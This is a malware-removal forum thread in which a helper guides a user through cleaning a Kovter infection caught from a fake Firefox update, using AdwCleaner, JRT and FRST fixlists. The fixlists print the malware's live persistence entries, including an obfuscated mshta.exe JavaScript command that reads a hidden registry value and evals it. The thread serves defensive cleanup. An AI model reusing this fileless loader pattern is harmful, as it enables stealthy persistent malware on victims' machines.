Jump to content

Help resolving KOTVER issue


BammersTX
 Share

Recommended Posts

Hello,

 

My Norton keeps telling me I have this KOTVER trojan, and forces me to restart daily or more often.  Now it's saying I have to manually remove it, but their tool I downloaded will not run.  Hopefully this is SOSAD to you guys, and you can help me be rid of this.

 

Attached are the files you requested.  Note that I ended up with 2 scan logs from the Emisoft scan, one more detailed than the other.  One was obtained from clicking the log menu at the top of the window, the other from a button at the bottom.  I have attached both.

 

Thanks in advance!

Addition.txt

FRST.txt

scan_161008-203354.txt

Scan_161008-203931.txt

Link to comment
Share on other sites

Hello again.

 

If it's of any help, I believe I know how I got this trojan on my system.

 

After getting an "urgent update for firefox" notice, I had a moment of dumb and ran the stupid thing.

 

https://support.mozilla.org/en-US/questions/1127436

 

The file I ran is still in my downloads folder and is named firefox-patch.js

 

I am certain my Norton said the file was safe, and the window that opened was a pretty good ripoff of the firefox logo, etc

 

I feel so stupid, so so stupid.  I'm usually good about spotting this kind of thing, but they seem to be getting better at spoofing and fooling the AV suites.

 

Anyway, looking forward to your instructions...

Link to comment
Share on other sites

Do the following:

Download AdwCleaner and save it on your desktop.

  • Close all open programs and Internet browsers (you may want to print our or write down these instructions first).
  • Double click on adwcleaner.exe to run the tool.
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Confirm each time with OK.
  • You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  • Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.

    NOTE: If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer.

Download Junkware Removal Tool and save it on your desktop.
  • Run the tool by double-clicking it.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log is saved to your desktop and will automatically open.
  • Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
Copy the below code to Notepad; Save As fixlist.txt to your Desktop.
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\Run: [**ffejr<*>] => "C:\Users\scott\AppData\Local\24b7\b962.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\MountPoints2: {175ba64f-8a58-11e6-9daa-acd1b8cc1fe0} - "D:\LG_PC_Programs.exe" 
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00013986.tmp
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00010259.tmp
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00000163.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00032604.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00032251.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00032157.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031934.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031786.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031595.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031233.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031066.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030748.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030589.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030328.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030121.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00029999.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00028964.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00027823.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00027540.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00027505.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00026592.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00024871.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00023942.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00023297.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022795.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022573.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022168.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022054.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021835.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021772.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021683.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021047.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021005.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00020660.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00019468.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00019429.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00018748.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00018230.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00018047.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00017403.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00017315.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00016916.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00015264.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014778.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014268.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014262.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014066.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00013945.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00013090.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00012698.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00012232.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00012147.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00011998.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010994.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010425.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010189.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010002.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00009930.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00008443.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00008163.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00007991.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00007625.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00007224.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00006878.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00006669.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00006511.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00005491.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00005033.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00004222.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00004148.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00003678.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00003567.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00003098.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00001534.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00001027.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00000637.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00000424.tmp
2016-09-28 19:37 - 2016-09-28 19:38 - 00006375 _____ C:\Users\scott\Downloads\firefox-patch.js
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00031452.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00030735.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00030116.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00028887.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00027627.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00027331.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00025687.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00023622.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00022846.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00022350.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00020472.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00016286.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00014265.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00012762.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00010053.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00009176.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00003410.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00001732.tmp
2016-09-27 17:24 - 2016-10-08 20:42 - 00000000 ____D C:\Users\scott\AppData\Local\24b7
2016-09-27 17:24 - 2016-09-27 17:24 - 00000000 ____D C:\Users\scott\AppData\Roaming\5e98
2016-08-13 02:55 - 2016-08-13 02:55 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Task: {0E6680C4-65BD-4498-86A8-0291850EC248} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> No File <==== ATTENTION
Task: {6B4CD56A-E85E-4874-AC8F-74325E57A603} - \RtHDVBg_PushButton -> No File <==== ATTENTION
Task: {9567E270-199F-4972-89A3-D7F6816C5917} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> No File <==== ATTENTION
Task: {A708FFF0-B18B-435B-BAA9-26357B528D23} - \Adobe Flash Player Updater -> No File <==== ATTENTION
Task: {C53D54BC-1CF1-4819-8276-1694DADC49C1} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> No File <==== ATTENTION
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\Software\Classes\4bbd: "C:\WINDOWS\system32\mshta.exe" "javascript:VGxyit7O2="oW7mjI0";k65q=new ActiveXObject("WScript.Shell");qnE8yJ="43ElWcQ";HLv8n=k65q.RegRead("HKCU\\software\\nyzpteqr\\ydbfjly");LHiU1ie="mPz";eval(HLv8n);s97cOXT="RaUV4SKB";" <===== ATTENTION
C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0f7.lnk
C:\Users\scott\AppData\Local\24b7\b962.lnk
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Link to comment
Share on other sites

Hi Kevin

 

Not exactly sure what you mean by "how things are running".  Generally, this machine seems a little snappier since running the original fix file, but still a little sluggish when on the interwebz.  The scan tools run fine.

 

NOTES

- EEK wants to quarantine a 'high risk' file, but I'm sure you can see that in the log.  As instructed, I did not quarantine it.

- Norton, now in addition to having me restart daily or more, gives me a pop up every 10 mintes or so saying it is blocking this KOTVER.  Oddly, I have not seen this pop up since I have been on this computer the last 45 minutes or so

- Previously, I saw a strange behavior in the folder C:\users\scott\appdata\local\24b7 where a file would just appear and disappear over and over.  I saw this even after the initial fix was run.  Oddly, this too is no longer happening.  I had noted before that the time/date stamps on all 3 files in this folder would update constantly, now they are all at 10/11/2016 3:11pm and not updating as before

 

Requested files are attached.

 

 

Requested files are attached

 

Addition.txt

FRST.txt

scan_161011-145835.txt

Link to comment
Share on other sites

Some additional info concerning my Norton.  The message I'm getting now is a bit different than the last few days. It is now popping up with "Auto-Protect is processing threats" then another pop up indicating it has resolved the threat.

I've attached an activity log from Norton for your perusal.

 

EDIT - This is happening again ---> "I saw a strange behavior in the folder C:\users\scott\appdata\local\24b7 where a file would just appear and disappear over and over."  I went and checked when Norton again started telling me it is blocking this KOTVER

 

WTH???? :wacko:

Norton Resolved Security Risks.txt

Link to comment
Share on other sites

Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\Run: [**ffejr<*>] => "C:\Users\scott\AppData\Local\24b7\b962.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8723.lnk [2016-10-11]
Startup: C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0f7.lnk [2016-10-11]
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00032608.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00031980.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00030872.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00027882.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00025323.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00019338.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00017763.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00015306.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00011347.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00010523.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00007393.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00006905.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00003766.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00002425.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00001861.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00001040.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00032274.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00031286.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00031161.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00031142.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00030874.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00030835.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00030167.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00029564.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00029233.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028684.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028215.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028119.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028084.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028078.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00027743.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00026762.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00026203.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00024436.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00024282.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00024098.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00023682.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00023461.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00023178.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00022869.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00022417.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00021601.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00020884.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00020491.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019897.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019747.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019640.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019472.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018988.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018697.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018600.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018429.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00017852.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00016583.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00016301.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00014313.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00013804.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00012433.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00012108.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011971.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011736.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011611.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011349.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00010656.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00009277.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00008971.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00007613.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00007191.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00006503.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00006206.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00005298.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00005208.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00005075.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004949.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004500.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004359.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004083.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00002989.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001992.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001896.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001462.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001397.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000465.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000412.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000201.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000015.tmp
2016-10-10 20:42 - 2016-10-11 14:47 - 00000000 ____D C:\Users\scott\AppData\Local\24b7
2016-10-10 20:42 - 2016-10-10 20:42 - 00000000 ____D C:\Users\scott\AppData\Roaming\5e98
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\Software\Classes\4bbd: "C:\WINDOWS\system32\mshta.exe" "javascript:d9eQpl6s="c04";B8N=new ActiveXObject("WScript.Shell");g5la1bpU="BeTx37Jm";e2lg9o=B8N.RegRead("HKCU\\software\\nyzpteqr\\ydbfjly");we5ko="GmTd6g";eval(e2lg9o);T1PSqOsO="SE";" <===== ATTENTION
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

Link to comment
Share on other sites

Hi Kevin,

 

I disabled Norton and ran the fix.  All went well.  I then ran a full Norton scan, and it found and resolved a bunch more KOTVER files.  It also quarantined FRST64, LOL.  I un-quarantined that, then exported the report from Norton.

 

The Norton and Fixlog reports are attached.

 

Fingers crossed... :)

Fixlog.txt

Resolved Security Risks.txt

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...